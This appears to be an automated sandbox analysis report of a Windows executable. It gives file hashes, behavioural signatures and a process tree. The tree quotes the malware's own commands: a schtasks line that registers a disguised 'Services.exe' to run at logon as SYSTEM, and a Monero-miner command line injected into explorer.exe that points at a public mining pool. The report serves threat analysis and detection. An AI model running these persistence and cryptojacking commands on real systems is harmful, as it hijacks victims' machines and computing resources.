Analysis
-
max time kernel
2s -
max time network
79s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08-01-2024 09:29
Static task
static1
Behavioral task
behavioral1
Sample
4b120bc4e493e86e34b1efea1a10db6c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4b120bc4e493e86e34b1efea1a10db6c.exe
Resource
win10v2004-20231222-en
General
-
Target
4b120bc4e493e86e34b1efea1a10db6c.exe
-
Size
64KB
-
MD5
4b120bc4e493e86e34b1efea1a10db6c
-
SHA1
25e40d98177f72e612fb2def28a6cec2af8abc00
-
SHA256
e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28
-
SHA512
a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc
-
SSDEEP
768:FSo8zLAAVxojgGxuwmSyd2glQ6pyZCQ75v3u211ToUQH7pFMhfgJ/3bhiAMG4r8j:FJaLlOjgTLBHpyQY5WHFMF41r7frqo
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2360 schtasks.exe 2192 schtasks.exe 112 schtasks.exe 2196 schtasks.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
4b120bc4e493e86e34b1efea1a10db6c.execmd.exedescription pid process target process PID 2512 wrote to memory of 2144 2512 4b120bc4e493e86e34b1efea1a10db6c.exe cmd.exe PID 2512 wrote to memory of 2144 2512 4b120bc4e493e86e34b1efea1a10db6c.exe cmd.exe PID 2512 wrote to memory of 2144 2512 4b120bc4e493e86e34b1efea1a10db6c.exe cmd.exe PID 2144 wrote to memory of 2360 2144 cmd.exe schtasks.exe PID 2144 wrote to memory of 2360 2144 cmd.exe schtasks.exe PID 2144 wrote to memory of 2360 2144 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2144
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"2⤵PID:2764
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit3⤵PID:3060
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=803⤵PID:2352
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"2⤵PID:2820
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"3⤵PID:2284
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit4⤵PID:1312
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=804⤵PID:812
-
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"3⤵PID:2056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit4⤵PID:3008
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=804⤵PID:300
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:2360
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:2192
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:112
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:2196
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
1KB
MD57c3ce479291895a889ef574500bd160a
SHA15aa6588eb94042b3bcb98c7f509ae567633df9fb
SHA256464ce867583292a3e4892526cd050276a32f2fe9267f3639c5f6072f5c7e5e48
SHA512901dc4e9182ed8cbe8b8eabaedd2f0f739da4c35b0b4c9eac00ec846ff08146014300011d87e30e2369999856f3d0a174eb12d0d5107aa0a5d41018e6d801082
-
Filesize
11KB
MD5829b7a6460eb92243d1c2800478e1851
SHA1d9ad0d883dfe971e0528090652d1ee3ce83d5c91
SHA2560f6e6bdbf6e2db0b45729c91b47d69e64a0ba4023d73f7c8853f8524d21491a1
SHA512a054aa6984de79f424263ccce7d978f6a836faaf4ac8c5d9e82fd3db5994f460fa84df284b0385bee76a9b7ad7ac4ac9f1f7b375b1ddaeb31015d8bfb7742cdc
-
Filesize
12KB
MD524ff7a763f96b93d11e47f99678620c6
SHA1cbbae214991f923b9f62eef19bf4a2ada083f514
SHA2562837716c122b32c14068667611fa685b0bb23450b17912de262013d2199634ba
SHA5122c9e0303f140d7a414f34964233c61f6f05f60a877ffd050a109ed956db9d098f0dc9afa98a949487b312630b44c88941f8df65324ac1ac355ffcc70ed69c0cb
-
Filesize
1KB
MD556257a0efb7163f04a1b0cbb0f3b8858
SHA1f48081a3710a0819b8bc8b824997a1db9b829ef4
SHA25638b9bcdf608ada6b99fe41dd74822d111a26b95ce5664b71199222334a44d059
SHA5121e3beaee2897d7cd4e5f56fb302767ce0641835db469048428a18a368e8f73757975044b9f900e46af8333c1c720122377895a4b09120eaf017e502140b6470b
-
Filesize
31KB
MD50389c8b710fc8e2dd8362880d3533b3c
SHA199899763b6dae58f95cab5a6d56ae2484e7fd7e2
SHA2569dac2b819e2c6a10d39e1d14bcc574733abb55881b1d5df286153e144e52ac96
SHA512b2e2232dafa9c003fccd85c5833657d2f0bd7512c650f4d56b1ad15c6d4c8b8c3e1ef2dfa243a5fccab9aad1f13e427fdf9b0bd7f70d6dee02daf5ca496cd048
-
Filesize
19KB
MD51d3c4bfb725ff6d0f0122cb71e3f2c4b
SHA1ba06da6acc4a0559286bad861f478bd83ea2d1d3
SHA256ba1e31256365fd5135499cbe6221f45309aa91e7acec71a9683f457e95adca9f
SHA5121e86958b7a92328bd40387523ce09493284fa2ff5d9fbe246002a0d7512f4d2415e774bf0998bb95967bdfdb7a58cd87dbb65a8828cc75de3b569385b1ba1d65
-
Filesize
19KB
MD5d3e81c1312d5d62d8f8b0baaf907e02a
SHA127ab3eae3e3bae77b73eb01c9de971b3ce75649f
SHA2569801e8d441a762a039b0fcc547bf6e8df408237acacdbd51453053516a103857
SHA512ff585bb9295e7a89e746fde83976828ee3644216391fb41d1879673efed31e29c89fb7ab84c21d7a8acac275cbf4936260a2a08390ef16fa7b11c06f7afb485d
-
Filesize
64KB
MD54b120bc4e493e86e34b1efea1a10db6c
SHA125e40d98177f72e612fb2def28a6cec2af8abc00
SHA256e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28
SHA512a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc
-
Filesize
1KB
MD5ab65238f29629afd00a51db09deddc36
SHA16ca24803e788990d5e799eb137346da959a6a260
SHA256ca28a9e9ea44cc77c29f881f56a9f2764a9338400c07c8f58bd0f2dd911602fa
SHA512799a3b661633dfedae79249961475f3180345ad38e6a157f32b4cfc3f50e3693d5fe6c388cfbe122ff38eb0edec5ba719b39411319c75c7cdaf0e3de2f02f3ce
-
Filesize
5KB
MD54ecf54592bb009fb984b11fcf2deee53
SHA197067be1765018e1ab9622cf9f389351c22e3ee7
SHA256dfaa6949f7707aae21b1519664ec3329d89436d64ea65396c78c777d85bf542e
SHA5126c50781796bcb17dac4609ae9224afdb46ae4eb9426b6034523f57f0334cec0202adfd33120c55c9b49df39e15b06c50ce3f97289aff66240f9e917eff1b4c80